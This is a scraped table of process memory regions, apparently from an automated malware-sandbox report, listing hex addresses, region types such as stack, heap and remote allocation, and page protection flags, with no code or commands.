page read and write
|
||
|
23DCF000
|
stack
|
page read and write
|
||
|
A5C000
|
stack
|
page read and write
|
||
|
7C39000
|
remote allocation
|
page execute and read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
23EC0000
|
direct allocation
|
page read and write
|
||
|
DBF000
|
stack
|
page read and write
|
||
|
6FE0000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
268A0000
|
trusted library allocation
|
page read and write
|
||
|
26300000
|
heap
|
page read and write
|
||
|
240C3000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
431000
|
unkown
|
page read and write
|
||
|
2434000
|
heap
|
page read and write
|
||
|
264D0000
|
trusted library allocation
|
page read and write
|
||
|
3030000
|
heap
|
page read and write
|
||
|
2150000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
266C0000
|
trusted library allocation
|
page read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
264D0000
|
trusted library allocation
|
page read and write
|
||
|
8772000
|
trusted library allocation
|
page read and write
|
||
|
8575000
|
heap
|
page read and write
|
||
|
261C0000
|
trusted library allocation
|
page read and write
|
||
|
26182000
|
trusted library allocation
|
page read and write
|
||
|
8920000
|
trusted library allocation
|
page read and write
|
||
|
CD69000
|
direct allocation
|
page execute and read and write
|
||
|
86A3000
|
heap
|
page read and write
|
||
|
20FE000
|
stack
|
page read and write
|
||
|
2621D000
|
stack
|
page read and write
|
||
|
5281000
|
trusted library allocation
|
page read and write
|
||
|
81A0000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
261B0000
|
trusted library allocation
|
page read and write
|
||
|
8697000
|
heap
|
page read and write
|
||
|
B10000
|
heap
|
page read and write
|
||
|
24030000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
266C0000
|
trusted library allocation
|
page read and write
|
||
|
26890000
|
trusted library allocation
|
page read and write
|
||
|
72F3000
|
heap
|
page read and write
|
||
|
24106000
|
trusted library allocation
|
page read and write
|
||
|
24030000
|
trusted library allocation
|
page read and write
|
||
|
2633B000
|
heap
|
page read and write
|
||
|
3018000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
7490000
|
trusted library allocation
|
page read and write
|
||
|
86FC000
|
heap
|
page read and write
|
||
|
26230000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26EAE000
|
stack
|
page read and write
|
||
|
75F000
|
heap
|
page read and write
|
||
|
23710000
|
direct allocation
|
page read and write
|
||
|
300E000
|
stack
|
page read and write
|
||
|
8400000
|
trusted library allocation
|
page read and write
|
||
|
23B5E000
|
stack
|
page read and write
|
||
|
6CAD000
|
stack
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
6D8D000
|
stack
|
page read and write
|
||
|
242DC000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
240CF000
|
trusted library allocation
|
page read and write
|
||
|
83F0000
|
trusted library allocation
|
page read and write
|
||
|
26170000
|
trusted library allocation
|
page read and write
|
||
|
24165000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
23ED0000
|
direct allocation
|
page read and write
|
||
|
26174000
|
trusted library allocation
|
page read and write
|
||
|
26240000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
2616E000
|
stack
|
page read and write
|
||
|
266C0000
|
trusted library allocation
|
page read and write
|
||
|
267EF000
|
stack
|
page read and write
|
||
|
773000
|
heap
|
page read and write
|
||
|
8679000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
71DE000
|
stack
|
page read and write
|
||
|
870E000
|
heap
|
page read and write
|
||
|
2F10000
|
trusted library allocation
|
page read and write
|
||
|
261D0000
|
heap
|
page read and write
|
||
|
9B69000
|
direct allocation
|
page execute and read and write
|
||
|
84C0000
|
trusted library allocation
|
page read and write
|
||
|
266C0000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
240B7000
|
trusted library allocation
|
page read and write
|
||
|
8780000
|
trusted library allocation
|
page execute and read and write
|
||
|
29EB000
|
trusted library allocation
|
page execute and read and write
|
||
|
2686E000
|
stack
|
page read and write
|
||
|
825E000
|
stack
|
page read and write
|
||
|
7730000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
2EF0000
|
trusted library allocation
|
page read and write
|
||
|
719E000
|
stack
|
page read and write
|
||
|
23BDD000
|
stack
|
page read and write
|
||
|
2F00000
|
trusted library allocation
|
page read and write
|
||
|
B969000
|
direct allocation
|
page execute and read and write
|
||
|
8F4E000
|
stack
|
page read and write
|
||
|
26240000
|
trusted library allocation
|
page read and write
|
||
|
261D0000
|
trusted library allocation
|
page read and write
|
||
|
26230000
|
trusted library allocation
|
page read and write
|
||
|
5CDD000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
72E4000
|
heap
|
page read and write
|
||
|
8698000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
261B0000
|
trusted library allocation
|
page read and write
|
||
|
76D000
|
heap
|
page read and write
|
||
|
266C0000
|
trusted library allocation
|
page read and write
|
||
|
470000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26240000
|
trusted library allocation
|
page read and write
|
||
|
2EC0000
|
trusted library section
|
page read and write
|
||
|
240E8000
|
trusted library allocation
|
page read and write
|
||
|
550000
|
heap
|
page read and write
|
||
|
23760000
|
direct allocation
|
page read and write
|
||
|
26630000
|
trusted library allocation
|
page execute and read and write
|
||
|
26890000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
236F0000
|
direct allocation
|
page read and write
|
||
|
23C9E000
|
stack
|
page read and write
|
||
|
6E80000
|
direct allocation
|
page read and write
|
||
|
262F0000
|
heap
|
page read and write
|
||
|
22A0000
|
heap
|
page read and write
|
||
|
26221000
|
trusted library allocation
|
page read and write
|
||
|
8FB0000
|
direct allocation
|
page execute and read and write
|
||
|
465000
|
unkown
|
page readonly
|
||
|
261B0000
|
trusted library allocation
|
page read and write
|
||
|
29E7000
|
trusted library allocation
|
page execute and read and write
|
||
|
225E000
|
stack
|
page read and write
|
||
|
8500000
|
trusted library allocation
|
page read and write
|
||
|
267AE000
|
stack
|
page read and write
|
||
|
241D2000
|
trusted library allocation
|
page read and write
|
||
|
84CB000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
4BEE000
|
stack
|
page read and write
|
||
|
2410A000
|
trusted library allocation
|
page read and write
|
||
|
261B0000
|
trusted library allocation
|
page read and write
|
||
|
213E000
|
stack
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
B38000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
74C0000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
29CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
240AF000
|
trusted library allocation
|
page read and write
|
||
|
23E30000
|
remote allocation
|
page read and write
|
||
|
26890000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
84D0000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26870000
|
trusted library allocation
|
page read and write
|
||
|
23C1C000
|
stack
|
page read and write
|
||
|
266C0000
|
trusted library allocation
|
page read and write
|
||
|
26230000
|
trusted library allocation
|
page read and write
|
||
|
24159000
|
trusted library allocation
|
page read and write
|
||
|
8570000
|
heap
|
page read and write
|
||
|
8F90000
|
heap
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
5E22000
|
trusted library allocation
|
page read and write
|
||
|
261B0000
|
trusted library allocation
|
page read and write
|
||
|
261B0000
|
trusted library allocation
|
page read and write
|
||
|
8790000
|
trusted library allocation
|
page execute and read and write
|
||
|
242E4000
|
trusted library allocation
|
page read and write
|
||
|
76F0000
|
trusted library allocation
|
page read and write
|
||
|
2667D000
|
stack
|
page read and write
|
||
|
DFD000
|
stack
|
page read and write
|
||
|
6E70000
|
direct allocation
|
page read and write
|
||
|
26870000
|
trusted library allocation
|
page read and write
|
||
|
26E60000
|
trusted library allocation
|
page execute and read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
5C99000
|
trusted library allocation
|
page read and write
|
||
|
26220000
|
trusted library allocation
|
page read and write
|
||
|
26E70000
|
trusted library allocation
|
page read and write
|
||
|
7710000
|
trusted library allocation
|
page read and write
|
||
|
6DF0000
|
direct allocation
|
page read and write
|
||
|
2400E000
|
stack
|
page read and write
|
||
|
76A0000
|
trusted library allocation
|
page read and write
|
There are 581 hidden memdumps, click here to show them.